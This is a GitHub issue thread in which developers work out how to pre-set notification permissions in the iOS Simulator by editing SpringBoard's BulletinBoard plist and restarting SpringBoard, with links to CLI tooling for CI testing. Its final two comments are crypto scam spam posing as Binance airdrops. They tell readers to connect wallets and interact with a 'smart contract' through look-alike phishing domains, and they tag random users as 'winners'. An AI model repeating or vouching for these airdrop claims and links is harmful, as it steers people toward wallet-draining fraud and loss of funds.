### ISSUE TITLE
Notification permission

### ISSUE THREAD

**Issue by LeoNatan** [plu/JPSimulatorHacks#11]
An excellent repo!
Was about to start a similar repo for [detox](https://github.com/wix/detox) when I found this one. Cool stuff!

One thing that seems not be stored in TCC.db is notification permissions. I am researching where this might be stored (a naive grep didn’t turn out anything so far). I will update here  as my research goes. If anyone has an idea where it might be stored, please share.

If I find a solution I will submit a PR.

**Comment by LeoNatan** [comment]
Interesting, if I put some data in /Library/BulletinBoard/SectionInfo.plist for the app, it does not prompt for notification and allows required notifications.

**Comment by LeoNatan** [comment]
I have implemented a POC that writes a `BBSectionInfo` object into the plist file. The problem so far is, it seems, that SpringBoard has an in-memory cache of this file, and so changing the file does not stop SpringBoard from displaying the alert. Killing SpringBoard does the trick.

**Comment by plu** [comment]
You could use `launchctl` inside the Simulator to restart Springboard.

**Comment by LeoNatan** [comment]
@plu Yes, that's exactly what I used.

**Comment by LeoNatan** [comment]
Well, this is something I solved, but not in a way that can really work for something like JPSimulatorHacks.

http://stackoverflow.com/questions/43067710/setting-a-bbsectioninfo-using-bbsettingsgateway-fails-for-unclear-reason

I actually got it to work, I created a utility app that exposed an extension, which when triggered, would use the private API to set the notification settings. However, this approach is only limited to notifications, because other TCC permissions cannot be changed in runtime past the first setting.
You can see my effort here: https://github.com/wix/detox/tree/master/detox/ios/DetoxHelper/DetoxHelper
Use something like https://github.com/LeoNatan/LNExtensionExecutor to run the extension.

For now, I went with a commandline util instead, which sets the permissions and kills SpringBoard. See here: https://github.com/wix/AppleSimulatorUtils

**Comment by billburgess** [comment]
Is this something that could be run as a precursor to tests running on CI? I'm preloading the simulator on CircleCI... having this run before my tests do would be helpful.

**Comment by LeoNatan** [comment]
Yes, you can use the CLI tool to set the permissions to whatever you want before running your tests in the simulator. One known limitation for now is that location permissions are not yet handled, because they are not TCC either, and I have not yet had time to investigate where those are saved and how.

**Comment by billburgess** [comment]
Thanks for the info.

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @telecomsxchange, @leejw51, @kentsigurdsen, @aggeloskar, @Kabayomi, @leogregianin, @eduardosbcabral
